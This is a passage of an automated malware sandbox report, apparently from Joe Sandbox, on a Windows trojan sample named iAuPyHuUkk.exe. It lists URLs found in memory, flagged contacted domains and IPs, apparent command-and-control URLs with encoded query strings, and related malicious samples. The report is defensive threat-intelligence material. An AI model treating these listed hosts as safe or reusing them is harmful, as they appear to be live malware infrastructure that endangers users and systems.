            http://www.ascendercorp.com/typedesigners.html90%Avira URL Cloudsafe
            http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.eot0%Avira URL Cloudsafe
            http://www.carterandcone.com80%URL Reputationsafe
            http://i4.cdn-image.com/__media__/fonts/open-sans/open-sans.otf0%Avira URL Cloudsafe
            http://i4.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg0%Avira URL Cloudsafe
            http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.otf0%Avira URL Cloudsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.fontbureau.comgrito0%URL Reputationsafe
            http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.eot?#iefix0%Avira URL Cloudsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://i4.cdn-image.com/__media__/pics/27587/BG_2.png)0%Avira URL Cloudsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.vintagepaseo.com/All_Inclusive_Vacation_Packages.cfm?fp=DaDrTtodEbKG7H0GzLA3PtWLrM%2BdgeV0%Avira URL Cloudsafe
            http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.svg#open-sans-bold0%Avira URL Cloudsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe
            http://www.vintagepaseo.com/__media__/design/underconstructionnotice.php?d=vintagepaseo.com0%Avira URL Cloudsafe
            http://www.vintagepaseo.com/mexq/?e66HNDO=NdiAijP1TUDTbxv0%Avira URL Cloudsafe
            http://www.carterandcone.como.Z0%Avira URL Cloudsafe
            http://www.galapagosdesign.com/0%URL Reputationsafe
            http://www.carterandcone.como.N0%Avira URL Cloudsafe
            http://www.carterandcone.comTC0%URL Reputationsafe
            http://www.vintagepaseo.com/__media__/js/trademark.php?d=vintagepaseo.com&type=ns0%Avira URL Cloudsafe
            http://www.vintagepaseo.com/mexq/?e66HNDO=NdiAijP1TUDTbxv+UVf96WWBcfe2HF0RhGf6TXdRPwqQZT7SHaZsoP4NORlVjEEjxsHi13Lz5g==&6lux=TrTPmvux50%Avira URL Cloudsafe
            http://www.vintagepaseo.com/Migraine_Pain_Relief.cfm?fp=DaDrTtodEbKG7H0GzLA3PtWLrM%2BdgeVzyxLURkW8zf0%Avira URL Cloudsafe
            http://i4.cdn-image.com/__media__/fonts/open-sans/open-sans.woff20%Avira URL Cloudsafe
            http://www.fontbureau.coma0%URL Reputationsafe
            http://www.fontbureau.come.com0%URL Reputationsafe
            http://en.w0%URL Reputationsafe
            http://www.vintagepaseo.com/Top_10_Luxury_Cars.cfm?fp=DaDrTtodEbKG7H0GzLA3PtWLrM%2BdgeVzyxLURkW8zfJI0%Avira URL Cloudsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.woff0%Avira URL Cloudsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://i4.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg0%Avira URL Cloudsafe
            http://www.founder.com.cn/cn70%Avira URL Cloudsafe
            http://www.jiyu-kobo.co.jp/ico0%Avira URL Cloudsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://i4.cdn-image.com/__media__/fonts/open-sans/open-sans.ttf0%Avira URL Cloudsafe
            http://i4.cdn-image.com/__media__/js/min.js?v2.30%Avira URL Cloudsafe
            http://www.Vintagepaseo.com0%Avira URL Cloudsafe
            http://www.vintagepaseo.com/Work_from_Home.cfm?fp=DaDrTtodEbKG7H0GzLA3PtWLrM%2BdgeVzyxLURkW8zfJIpKi%0%Avira URL Cloudsafe
            http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.ttf0%Avira URL Cloudsafe
            http://www.tiro.comc0%URL Reputationsafe
            http://www.vintagepaseo.com/Credit_Card_Application.cfm?fp=DaDrTtodEbKG7H0GzLA3PtWLrM%2BdgeVzyxLURkW0%Avira URL Cloudsafe
            http://www.xn--aprendes-espaol-brb.com/mexq/?e66HNDO=aPMuX7G1Ot9XJXghMAabXwwkzBWzprGcmmQ5cfrgMP5E/C43hf1Uz5bqYekFv+cUss1JtU0p5g==&6lux=TrTPmvux50%Avira URL Cloudsafe
            http://i4.cdn-image.com/__media__/fonts/open-sans/open-sans.eot?#iefix0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.vintagepaseo.com
            208.91.197.27
            truetrue
              unknown
              windowsupdate.s.llnwi.net
              178.79.242.0
              truefalse
                unknown
                www.cyebang.com
                154.216.110.149
                truetrue
                  unknown
                  www.xn--aprendes-espaol-brb.com
                  217.160.0.226
                  truetrue
                    unknown
                    www.brandmty.net
                    unknown
                    unknowntrue
                      unknown
                      www.districonio.com
                      unknown
                      unknowntrue
                        unknown
                        www.iphone13promax.design
                        unknown
                        unknowntrue
                          unknown
                          www.umdasch-lagertechnik.com
                          unknown
                          unknowntrue
                            unknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            http://www.cyebang.com/mexq/?e66HNDO=g6L0/Z2eA1jwRGo1l6rXBhzWGtzMcF3Ol1vrZIbNMV/6CHuR9YyStXwolwULrpYmw34wy4pkGQ==&6lux=TrTPmvux5true
                            • Avira URL Cloud: malware
                            unknown
                            http://www.vintagepaseo.com/mexq/?e66HNDO=NdiAijP1TUDTbxv+UVf96WWBcfe2HF0RhGf6TXdRPwqQZT7SHaZsoP4NORlVjEEjxsHi13Lz5g==&6lux=TrTPmvux5true
                            • Avira URL Cloud: safe
                            unknown
                            http://www.xn--aprendes-espaol-brb.com/mexq/?e66HNDO=aPMuX7G1Ot9XJXghMAabXwwkzBWzprGcmmQ5cfrgMP5E/C43hf1Uz5bqYekFv+cUss1JtU0p5g==&6lux=TrTPmvux5true
                            • Avira URL Cloud: safe
                            unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://i4.cdn-image.com/__media__/pics/27586/searchbtn.png)control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.fontbureau.com/designersGiAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpfalse
                              high
                              http://www.fontbureau.com/designers/?iAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpfalse
                                high
                                http://i4.cdn-image.com/__media__/fonts/open-sans/open-sans.svg#open-sanscontrol.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.founder.com.cn/cn/bTheiAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://i4.cdn-image.com/__media__/fonts/open-sans/open-sans.woffcontrol.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.fontbureau.com/designers?iAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpfalse
                                  high
                                  http://www.vintagepaseo.com/display.cfmcontrol.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://i4.cdn-image.com/__media__/pics/27587/Left.png)control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://i4.cdn-image.com/__media__/fonts/open-sans/open-sans.eotcontrol.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.tiro.comiAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.jiyu-kobo.co.jp//eiAuPyHuUkk.exe, 00000000.00000003.356809430.0000000006368000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.fontbureau.com/designersiAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpfalse
                                    high
                                    http://push.zhanzhang.baidu.com/push.jscontrol.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpfalse
                                      high
                                      http://www.goodfont.co.kriAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.carterandcone.comiAuPyHuUkk.exe, 00000000.00000003.355148904.0000000006366000.00000004.00000001.sdmp, iAuPyHuUkk.exe, 00000000.00000003.355959860.0000000006365000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://i4.cdn-image.com/__media__/pics/27587/Right.png)control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.collada.org/2005/11/COLLADASchema9DoneiAuPyHuUkk.exe, 00000000.00000002.370703013.00000000033F7000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.sajatypeworks.comiAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.zhongyicts.com.cnavaiAuPyHuUkk.exe, 00000000.00000003.355148904.0000000006366000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.typography.netDiAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.founder.com.cn/cn/cTheiAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.galapagosdesign.com/staff/dennis.htmiAuPyHuUkk.exe, 00000000.00000002.373816702.0000000006360000.00000004.00000001.sdmp, iAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://fontfabrik.comiAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.woff2control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.ascendercorp.com/typedesigners.html9iAuPyHuUkk.exe, 00000000.00000003.357814039.000000000639D000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.eotcontrol.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.carterandcone.com8iAuPyHuUkk.exe, 00000000.00000003.355959860.0000000006365000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://i4.cdn-image.com/__media__/fonts/open-sans/open-sans.otfcontrol.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://i4.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpgcontrol.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.otfcontrol.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.galapagosdesign.com/DPleaseiAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.fontbureau.comgritoiAuPyHuUkk.exe, 00000000.00000002.373816702.0000000006360000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.eot?#iefixcontrol.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.fonts.comiAuPyHuUkk.exe, 00000000.00000003.351807780.000000000637B000.00000004.00000001.sdmpfalse
                                        high
                                        http://www.sandoll.co.kriAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://i4.cdn-image.com/__media__/pics/27587/BG_2.png)control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.urwpp.deDPleaseiAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.vintagepaseo.com/All_Inclusive_Vacation_Packages.cfm?fp=DaDrTtodEbKG7H0GzLA3PtWLrM%2BdgeVcontrol.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.svg#open-sans-boldcontrol.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.zhongyicts.com.cniAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://hm.baidu.com/hm.js?8518669f0d31e41508be0babf5a8fc28control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpfalse
                                          high
                                          http://www.sakkal.comiAuPyHuUkk.exe, 00000000.00000003.357744601.0000000006395000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.vintagepaseo.com/__media__/design/underconstructionnotice.php?d=vintagepaseo.comcontrol.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.vintagepaseo.com/mexq/?e66HNDO=NdiAijP1TUDTbxvcontrol.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.carterandcone.como.ZiAuPyHuUkk.exe, 00000000.00000003.355148904.0000000006366000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000005.00000000.393239210.000000000095C000.00000004.00000020.sdmpfalse
                                            high
                                            http://www.apache.org/licenses/LICENSE-2.0iAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpfalse
                                              high
                                              http://www.fontbureau.comiAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpfalse
                                                high
                                                http://www.galapagosdesign.com/iAuPyHuUkk.exe, 00000000.00000003.362371401.0000000006395000.00000004.00000001.sdmp, iAuPyHuUkk.exe, 00000000.00000003.362345727.0000000006395000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.carterandcone.como.NiAuPyHuUkk.exe, 00000000.00000003.355148904.0000000006366000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.fontbureau.com/designers/cabarga.htmlliAuPyHuUkk.exe, 00000000.00000003.360703238.0000000006395000.00000004.00000001.sdmpfalse
                                                  high
                                                  http://www.carterandcone.comTCiAuPyHuUkk.exe, 00000000.00000003.355148904.0000000006366000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.vintagepaseo.com/__media__/js/trademark.php?d=vintagepaseo.com&type=nscontrol.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://zz.bdstatic.com/linksubmit/push.jscontrol.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpfalse
                                                    high
                                                    http://www.vintagepaseo.com/Migraine_Pain_Relief.cfm?fp=DaDrTtodEbKG7H0GzLA3PtWLrM%2BdgeVzyxLURkW8zfcontrol.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://i4.cdn-image.com/__media__/fonts/open-sans/open-sans.woff2control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.fontbureau.comaiAuPyHuUkk.exe, 00000000.00000002.373816702.0000000006360000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.fontbureau.come.comiAuPyHuUkk.exe, 00000000.00000002.373816702.0000000006360000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://en.wiAuPyHuUkk.exe, 00000000.00000003.355959860.0000000006365000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.vintagepaseo.com/Top_10_Luxury_Cars.cfm?fp=DaDrTtodEbKG7H0GzLA3PtWLrM%2BdgeVzyxLURkW8zfJIcontrol.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.carterandcone.comliAuPyHuUkk.exe, 00000000.00000003.355148904.0000000006366000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.woffcontrol.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.fontbureau.com/designers/cabarga.htmlNiAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpfalse
                                                      high
                                                      http://www.founder.com.cn/cniAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://i4.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpgcontrol.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.fontbureau.com/designers/frere-jones.htmliAuPyHuUkk.exe, 00000000.00000003.360377419.0000000006395000.00000004.00000001.sdmp, iAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpfalse
                                                        high
                                                        http://www.fontbureau.com/designers/cabarga.htmliAuPyHuUkk.exe, 00000000.00000003.360703238.0000000006395000.00000004.00000001.sdmpfalse
                                                          high
                                                          http://www.founder.com.cn/cn7iAuPyHuUkk.exe, 00000000.00000003.354702125.000000000636B000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.jiyu-kobo.co.jp/icoiAuPyHuUkk.exe, 00000000.00000003.356809430.0000000006368000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.jiyu-kobo.co.jp/iAuPyHuUkk.exe, 00000000.00000003.356809430.0000000006368000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://i4.cdn-image.com/__media__/fonts/open-sans/open-sans.ttfcontrol.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://i4.cdn-image.com/__media__/js/min.js?v2.3control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.fontbureau.com/designers8iAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpfalse
                                                            high
                                                            http://www.Vintagepaseo.comcontrol.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.vintagepaseo.com/Work_from_Home.cfm?fp=DaDrTtodEbKG7H0GzLA3PtWLrM%2BdgeVzyxLURkW8zfJIpKi%control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.ttfcontrol.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.tiro.comciAuPyHuUkk.exe, 00000000.00000003.351987416.000000000637B000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.vintagepaseo.com/Credit_Card_Application.cfm?fp=DaDrTtodEbKG7H0GzLA3PtWLrM%2BdgeVzyxLURkWcontrol.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://i4.cdn-image.com/__media__/fonts/open-sans/open-sans.eot?#iefixcontrol.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown

                                                            Contacted IPs

                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs

                                                            Public

                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            217.160.0.226
                                                            www.xn--aprendes-espaol-brb.comGermany
                                                            8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                            154.216.110.149
                                                            www.cyebang.comSeychelles
                                                            132839POWERLINE-AS-APPOWERLINEDATACENTERHKtrue
                                                            208.91.197.27
                                                            www.vintagepaseo.comVirgin Islands (BRITISH)
                                                            40034CONFLUENCE-NETWORK-INCVGtrue

                                                            General Information

                                                            Joe Sandbox Version:33.0.0 White Diamond
                                                            Analysis ID:501991
                                                            Start date:13.10.2021
                                                            Start time:13:36:28
                                                            Joe Sandbox Product:CloudBasic
                                                            Overall analysis duration:0h 11m 9s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:light
                                                            Sample file name:iAuPyHuUkk (renamed file extension from none to exe)
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                            Number of analysed new started processes analysed:24
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • HDC enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Detection:MAL
                                                            Classification:mal100.troj.evad.winEXE@8/1@8/3
                                                            EGA Information:Failed
                                                            HDC Information:
                                                            • Successful, ratio: 26.8% (good quality ratio 24.7%)
                                                            • Quality average: 69.8%
                                                            • Quality standard deviation: 31.6%
                                                            HCA Information:
                                                            • Successful, ratio: 100%
                                                            • Number of executed functions: 0
                                                            • Number of non-executed functions: 0
                                                            Cookbook Comments:
                                                            • Adjust boot time
                                                            • Enable AMSI
                                                            Warnings:
                                                            Show All
                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                            • Excluded IPs from analysis (whitelisted): 95.100.218.79, 20.82.209.183, 20.54.110.249, 40.112.88.60, 2.20.178.33, 2.20.178.24, 95.100.216.89
                                                            • Excluded domains from analysis (whitelisted): iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                            • VT rate limit hit for: /opt/package/joesandbox/database/analysis/501991/sample/iAuPyHuUkk.exe

                                                            Simulations

                                                            Behavior and APIs

                                                            TimeTypeDescription
                                                            13:37:36API Interceptor1x Sleep call for process: iAuPyHuUkk.exe modified

                                                            Joe Sandbox View / Context

                                                            IPs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                            217.160.0.226vURlUPQLT0.exeGet hashmaliciousBrowse
                                                            • www.xn--aprendes-espaol-brb.com/mexq/?4h=0bnTL8qh9&h8yxlz-=aPMuX7G1Ot9XJXghMAabXwwkzBWzprGcmmQ5cfrgMP5E/C43hf1Uz5bqYeoF8uQX181f
                                                            208.91.197.27wDzceoRPhB.exeGet hashmaliciousBrowse
                                                            • www.vaughnmethod.com/ed9s/?j6A=cMgc34DI6EHgRBPPCU1upM8r6W5gmyFdUZ6BCP+wlJ0AAQ+v0J4fB8uzS/jKj/yu2Uo5&2d64u=GZS0ntMXED7DC
                                                            etiyrfIKft.exeGet hashmaliciousBrowse
                                                            • www.weprepareamerica-world.com/n092/?h0Gdj4dh=7QNXrpC+0zTYuDSJvYtcqWvwaJpzyS75Y6CJpFMcqskYdcMJUPnJbkzMB91F/535v440&1bkX=KN9l7
                                                            INVPRF2100114_pdf.exeGet hashmaliciousBrowse
                                                            • www.yourotcs.com/euzn/?vPAl-=CR-TLLc&5j=Jq5AABYnwO9dbv77N4nPQwsgHB5GKQbjMYkkdBpcGmLbEHlDRj4+NcKZLwDv+32oOSRS
                                                            PkF9Fg2Tnc.exeGet hashmaliciousBrowse
                                                            • www.thymoscorp.com/n092/?Cptd5=T476+wLEZakNnatpzDgnd+i8GD3CeHIKKZKbWkLuO1H4v0vGZa8Ua7CXK/8Rlqil4H1a&y4=7n3dvv
                                                            2WK7SGkGVZ.exeGet hashmaliciousBrowse
                                                            • www.andrewfjohnston.com/b2c0/?1bV=j6ATrf&7nlpd=nPJDWeDX3x/7yoIb4Y8ACYvoKxwYoowpnQPys4jm4E2BXf8WUJ1hnsC1S/FzrgAx/9vb
                                                            NEW ORDER INQUIRY_Q091421.PDF.exeGet hashmaliciousBrowse
                                                            • www.barrier-to-entry.com/h5jc/?8pW=UAgdrLYBEBHnZD6vumMuWShxuTvQQAMT+4FDgagiYMIIlUmoqNFKWavZLlig6d0hZcfT&1bE8p=8p04q8mHnH
                                                            ugsuHxq7Ey.exeGet hashmaliciousBrowse
                                                            • www.weprepareamerica-world.com/n092/?UL=7QNXrpC+0zTYuDSJvYtcqWvwaJpzyS75Y6CJpFMcqskYdcMJUPnJbkzMB91vgJH5r6w0&rP=4hOh3
                                                            DHL_Online_Receipt.docGet hashmaliciousBrowse
                                                            • www.getrichadams.com/c3hy/?yfL8-tq0=+C97xekWOCtRqspsnKWJgGOuAPiwQzy0YYswFyxb/tYUxnF7+gywk2v6MOtw6eF1FCkoSQ==&f6A8=dxo0srcx
                                                            m2F8C6rz9J.exeGet hashmaliciousBrowse
                                                            • www.yesterdaystomorrownow.com/zizv/?FL0lxhs=tq18rE4QkgIvfNIpkqEMdP/7PcSlbVRZ9TDCQpLEuCwXiE5u+3jx/eVPwHHQIFKJLFE+&1bT8s=1bbhp0_P
                                                            AWB.docGet hashmaliciousBrowse
                                                            • www.shans-online.com/fzsg/?i2M8mbL8=wYA5+ODQw7YIFkSefVPDQdsb1XpS7kW79pgoTMk5mjoxU7vP2T6by19X6tBJuHEX3lcOtQ==&X6A=bTMtXz7XNfKd
                                                            SOA.exeGet hashmaliciousBrowse
                                                            • www.andrewfjohnston.com/b2c0/?3ff=y6AT2b&m4C=nPJDWeDSq27+w4JhkI8ACYvoKxwYoowpnQPys4jm4E2BXf8WUJ1hnsC1S8FsokkK/+Kf
                                                            HBW PAYMENT LIST FOR 2021,20212009.xlsxGet hashmaliciousBrowse
                                                            • www.hivizpeople.com/n092/?ixl0i0t=uaY0THpty5EvCloUtnm06lpodfUxh6yq2Ukbc245yKA9WepW8xtBavSpPmKwlutgZVJfqg==&kb=-Z4LWJsPDRiPHr
                                                            77dsREO8Me.exeGet hashmaliciousBrowse
                                                            • www.yourotcs.com/euzn/?6lDh4=Jq5AABYnwO9dbv77N4nPQwsgHB5GKQbjMYkkdBpcGmLbEHlDRj4+NcKZLwDFhHGoKQZS&Ph-PB=1bpljFA
                                                            Sales _DEG212004755711421641.pdf.exeGet hashmaliciousBrowse
